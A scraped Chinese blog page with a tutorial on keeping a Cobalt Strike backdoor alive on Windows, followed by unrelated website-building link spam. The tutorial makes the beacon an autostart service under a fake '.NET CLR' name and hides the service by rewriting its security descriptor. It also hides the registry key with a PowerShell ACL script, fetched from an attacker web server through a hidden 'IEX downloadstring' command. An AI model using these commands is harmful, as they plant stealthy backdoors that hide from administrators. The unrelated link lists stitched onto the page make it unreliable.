当前位置: 首页 > news >正文

文化网站建设需要的功能全网线报 实时更新

文化网站建设需要的功能,全网线报 实时更新,网站开发与维护都有些什么,企业门户网站建设 验收我们先打开cs的服务端 然后我们打开客户端 我们点击连接 然后弹出这个界面 然后我们新建一个监听器 然后我们生成一个beacon 然后把这个复制到目标主机 然后我们双击 运行 然后cs这边就上线了 然后我们把进程结束掉 然后我们再把他删除掉 然后我们创建服务 将后门程序注册…我们先打开cs的服务端 然后我们打开客户端 我们点击连接 然后弹出这个界面 然后我们新建一个监听器 然后我们生成一个beacon 然后把这个复制到目标主机 然后我们双击 运行 然后cs这边就上线了 然后我们把进程结束掉 然后我们再把他删除掉 然后我们创建服务 将后门程序注册为自启动服务是我们常用的一种进行权限维持的方法通常可以通过sc或者powershell来进行创建。 cmd创建自启动服务 sc create .NET CLR Networking 3.5.0.0 binpath cmd.exe /k C:\Users\administrator\1.exe depend Tcpip obj Localsystem start auto 然后我们打开服务 就能看见我们新创建的服务 我们要把它开启 然后我们cs 这边就上线了 我们这里来查看服务 sc query | findstr .NET CLR Networking 3.5.0.0 这里出现第二个后门 因为我刚才又重新启动服务了 我们把第一个删除掉 当然我也可以用powershell powershell创建自启动服务 new-service –Name .NET CLR Networking 3.5.0.0 –DisplayName .NET CLR Networking 3.5.0.0 –BinaryPathName cmd.exe /k C:\Users\administrator\beacon.exe – StartupType AutomaticDelayedStart 但创建的服务很容易被发现通过sc query和Get-Service很容易发现直接查询服务也能看见 通过修改SDDL(安全描述符)隐藏服务 众所周知 windows访问控制模型分为两部分 access token(访问令牌) 安全描述符 安全描述符包含与安全对象关联的安全信息。安全描述符包含安全描述符结构及其关联的安全信息。安全描述符可以包含以下安全信息 对象的所有者和主要组的Sid 安全标识符 用于指定允许或拒绝特定用户或组的访问权限的DACL。 指定为对象生成审核记录的访问尝试类型的SACL。 一组限制安全描述符或其各个成员的含义的控制位。 windows中的安全对象都使用SDDL字符串来表示访问对象对于安全对象的权限服务自然也存在其SDDL并且sc命令中可以设置SDDL。那么通过更改SDDL可以修改服务的各种权限来隐藏服务 sc sdset .NET CLR Networking 3.5.0.0 D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) 然后我们服务就找不见了 在cmd窗口呀查询不到 在知道服务名的前提下查询会显示拒绝访问 net start .NET CLR Networking 3.5.0.0 这里我们的cs也上线了 但这样做有一个问题在注册表中很容易看到异常value。 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NETCLRNetworking3.5.0.0 这里也有这个存在 修改注册表ACL 我们可以通过修改注册表的DACL来拒绝对值的查询达到隐藏异常值的效果。 这里给出一个通过powershell修改注册表项的访问权限的简单脚本 function Server-Sddl-Change{ [CmdletBinding()] param ( [parameter(Mandatory$false)][String]$Name ) $ROOT HKLM:\SYSTEM\CurrentControlSet\Services\ $S $ROOT$NAME $acl Get-Acl $S $acl.SetAccessRuleProtection($true, $false)$person [System.Security.Principal.NTAccount]Everyone $access [System.Security.AccessControl.RegistryRights]QueryValues $inheritance [System.Security.AccessControl.InheritanceFlags]None $propagation [System.Security.AccessControl.PropagationFlags]None $type [System.Security.AccessControl.AccessControlType]Deny $rule New-Object System.Security.AccessControl.RegistryAccessRule( $person,$access,$inheritance,$propagation,$type) $acl.AddAccessRule($rule)$person [System.Security.Principal.NTAccount]Everyone $access [System.Security.AccessControl.RegistryRights]SetValue,CreateSubKey,EnumerateSu bKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,Chang ePermissions,TakeOwnership $inheritance [System.Security.AccessControl.InheritanceFlags]None $propagation [System.Security.AccessControl.PropagationFlags]None $type [System.Security.AccessControl.AccessControlType]Allow $rule New-Object System.Security.AccessControl.RegistryAccessRule( $person,$access,$inheritance,$propagation,$type) $acl.AddAccessRule($rule)Set-Acl $S $acl }我们在kail上新建1.ps1 然后我们开启web服务 python3 -m http.server 80 远程加载powershell脚本 powershell.exe -exec bypass -nop -w hidden -c IEX((new-object net.webclient).downloadstring(http://192.168.25.138/1.ps1));Server-Sddl-Change - Name .NET CLR Networking 3.5.0.0 然后哦我们重启计算机 发现也是隐藏了 详细 利用安全描述符隐藏服务后门进行权限维持
http://www.hkea.cn/news/14440509/

相关文章:

  • 做社交的招聘网站卧龙区网站建设
  • go语言网站开发教程百度网盘登录入口 网页
  • 织梦cms建站百度网做网站吗
  • 泊头市网站建设价格wordpress留言的小伙伴
  • 做网站绑定 对应的域名制作一个网站的流程有哪些
  • 南京网站制作报价基于cms设计网站的背景意义
  • 建站宝盒后台wordpress 页码插件
  • 宁波方正建设监理网站西安产品设计公司有哪些
  • 中山网站设计收费标准一个专门做海鲜的网站
  • 华强北附近网站建设WordPress模版二次元
  • 做视频的素材什么网站好免费建立单位的网站
  • 河北建设信息平台网站小程序开发公司案例
  • 苏州全网网站建设湖南网络推广服务
  • 天津城建设计院网站巧家县城乡建设局网站
  • 可以做外链的视频网站运城做网站方式方法
  • 网站开发的过程中遇到的难题七台河新闻头条
  • 网站开发项目经验描述怎么写网站制作一个人可以做吗
  • 旅游网站设计与建设论文介绍网络营销的短文
  • 做网站用什么电脑配置专业网站建设费用报价
  • 浙江平台网站建设设计网站开发时间安排
  • 网站底部素材今天最新新闻摘抄
  • 长沙的互联网网站公司哪家好黄骅市企业名录
  • 网站开发软件开发流程网站域名的分类
  • 凡科建站步骤网站内移动的图片怎么做的
  • 网站流量和带宽厦门seo关键词优化培训
  • 辽阳做网站公司crm管理系统都有哪些
  • 北京网站设计公司sx成都柚米科技15金华网站开发公司
  • 上海网站建设与设计公司网站建设外包网
  • 郑青松找谁做的网站网站项目设计与制作综合实训
  • 建二手车网站淘宝seo推广优化